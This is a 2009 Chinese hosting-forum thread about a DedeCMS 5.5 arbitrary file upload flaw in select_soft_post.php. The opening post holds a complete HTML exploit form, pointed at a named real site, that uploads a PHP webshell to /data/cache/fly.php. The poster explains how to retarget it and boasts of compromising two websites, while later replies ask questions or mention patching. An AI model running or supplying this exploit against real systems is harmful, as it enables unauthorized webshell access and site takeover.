全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 14841|回复: 51
打印 上一主题 下一主题

[经验] dede5.5爆漏洞了!!我站被日了!(附带利用方法)

[复制链接]
跳转到指定楼层
1#
发表于 2009-10-27 00:20:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.sebug.net/vulndb/12518/

影响版本:
Dedecms 5.5漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考
by:Flyh4t
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  <input type='hidden' name='activepath' value='/data/cache/' />
  <input type='hidden' name='cfg_basedir' value='../../' />
  <input type='hidden' name='cfg_imgtype' value='php' />
  <input type='hidden' name='cfg_not_allowall' value='txt' />
  <input type='hidden' name='cfg_softtype' value='php' />
  <input type='hidden' name='cfg_mediatype' value='php' />
  <input type='hidden' name='f' value='form1.enclosure' />
  <input type='hidden' name='job' value='upload' />
  <input type='hidden' name='newname' value='fly.php' />
  Select U Shell <input type='file' name='uploadfile' size='25' />
  <input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
2#
 楼主| 发表于 2009-10-27 00:21:56 | 只看该作者
把以上代码改成 html    url:改为目标站!
3#
发表于 2009-10-27 00:22:12 | 只看该作者
4#
发表于 2009-10-27 00:22:28 | 只看该作者
看不懂。
5#
发表于 2009-10-27 00:23:14 | 只看该作者
我的还是5.3
6#
 楼主| 发表于 2009-10-27 00:25:54 | 只看该作者
傻瓜利用方法!!   

我很坏  居然成功了2个网站
7#
 楼主| 发表于 2009-10-27 00:28:53 | 只看该作者
今天才爆的
8#
发表于 2009-10-27 00:33:10 | 只看该作者
我站register_globals是关闭的`
9#
发表于 2009-10-27 00:36:00 | 只看该作者
靠。。我马上去更新。。
10#
发表于 2009-10-27 00:36:33 | 只看该作者

回复 7# 的帖子

上传的文件跑哪里了》?
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-9-27 14:23 , Processed in 0.141259 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表